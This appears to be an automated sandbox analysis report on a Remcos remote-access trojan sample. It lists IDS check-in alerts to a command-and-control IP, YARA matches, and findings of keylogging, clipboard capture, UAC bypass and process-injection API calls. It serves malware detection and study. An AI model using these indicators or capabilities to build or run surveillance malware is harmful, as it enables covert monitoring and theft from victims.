                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49722 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49702 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49708 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49709 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49732 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49746 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49736 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49698 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49721 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49703 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49726 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49696 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49713 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49737 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49724 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49729 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49748 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49711 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49723 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49693 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49734 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49733 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49742 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49699 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49718 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49712 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49707 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49728 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49710 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49697 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49730 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49714 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49704 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49706 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49740 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49731 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49719 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49747 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49744 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49739 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49738 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49745 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49720 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49725 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49743 -> 196.251.83.79:786
                      Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.6:49741 -> 196.251.83.79:786
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorIPs: 196.251.83.79
                      Source: global trafficTCP traffic: 192.168.2.6:49693 -> 196.251.83.79:786
                      Source: Joe Sandbox ViewASN Name: SONIC-WirelessZA SONIC-WirelessZA
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.79
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E04574 WaitForSingleObject,SetEvent,recv,8_2_02E04574
                      Source: colorcpl.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: x.exe, 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, colorcpl.exe, 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: x.exe, 00000003.00000003.1234992961.000000007ED63000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234992961.000000007EDE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1267818979.0000000020693000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1234397390.000000007EDF4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E09D1E SetWindowsHookExA 0000000D,02E09D0A,000000008_2_02E09D1E
                      Installs a global keyboard hook
                      Source: C:\Windows\SysWOW64\colorcpl.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\colorcpl.exeJump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0B158 OpenClipboard,GetClipboardData,CloseClipboard,8_2_02E0B158
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,8_2_02E1696E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0301696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,16_2_0301696E
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E0B158 OpenClipboard,GetClipboardData,CloseClipboard,8_2_02E0B158
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E09E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,8_2_02E09E4A
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032B00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523747715.0000000032AE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2523856221.00000000344BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1376834668.0000000030700000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.1422766132.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E1CF2D SystemParametersInfoW,8_2_02E1CF2D
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0301CF2D SystemParametersInfoW,16_2_0301CF2D

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 16.2.colorcpl.exe.3000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 8.2.colorcpl.exe.2e00000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.colorcpl.exe.2bd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 3.2.x.exe.28f0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000010.00000002.1343119653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000003.00000002.1269621108.000000007E4F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000003.00000002.1255776445.0000000002925000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000013.00000002.1422872475.0000000002BD0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000008.00000002.2501429735.0000000002E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: x.exe PID: 6980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: colorcpl.exe PID: 5516, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: colorcpl.exe PID: 7308, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: colorcpl.exe PID: 7504, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\SysWOW64\colorcpl.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903380 NtWriteVirtualMemory,3_2_02903380
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903034 NtAllocateVirtualMemory,3_2_02903034
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909654 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,3_2_02909654
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,3_2_02909738
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029095CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_029095CC
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903C04 NtQueueApcThread,3_2_02903C04
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290421A GetThreadContext,SetThreadContext,NtResumeThread,3_2_0290421A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290421C GetThreadContext,SetThreadContext,NtResumeThread,3_2_0290421C
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02903032 NtAllocateVirtualMemory,3_2_02903032
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02909578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,3_2_02909578
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973380 NtWriteVirtualMemory,15_2_02973380
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973034 NtAllocateVirtualMemory,15_2_02973034
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979738 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,15_2_02979738
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973C04 NtQueueApcThread,15_2_02973C04
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_0297421C GetThreadContext,SetThreadContext,NtResumeThread,15_2_0297421C
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_0297421A GetThreadContext,SetThreadContext,NtResumeThread,15_2_0297421A
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979809 NtQueryInformationFile,NtReadFile,NtClose,15_2_02979809
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02973032 NtAllocateVirtualMemory,15_2_02973032
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979654 RtlDosPathNameToNtPathName_U,NtWriteFile,NtClose,15_2_02979654
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_0297341B NtWriteVirtualMemory,15_2_0297341B
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_029795CC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_029795CC
                      Source: C:\Users\user\Links\Ekbmajrx.PIFCode function: 15_2_02979578 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02979578
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0290A634 InetIsOffline,Sleep,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,3_2_0290A634
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02E16861 ExitWindowsEx,LoadLibraryA,GetProcAddress,8_2_02E16861
                      Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_03016861 ExitWindowsEx,LoadLibraryA,GetProcAddress,16_2_03016861
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_028F20B43_2_028F20B4
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029789E23_2_029789E2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0294C9EE3_2_0294C9EE
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0295C94A3_2_0295C94A
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_0294CF653_2_0294CF65
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_02944D793_2_02944D79
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029632F23_2_029632F2
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_029392103_2_02939210
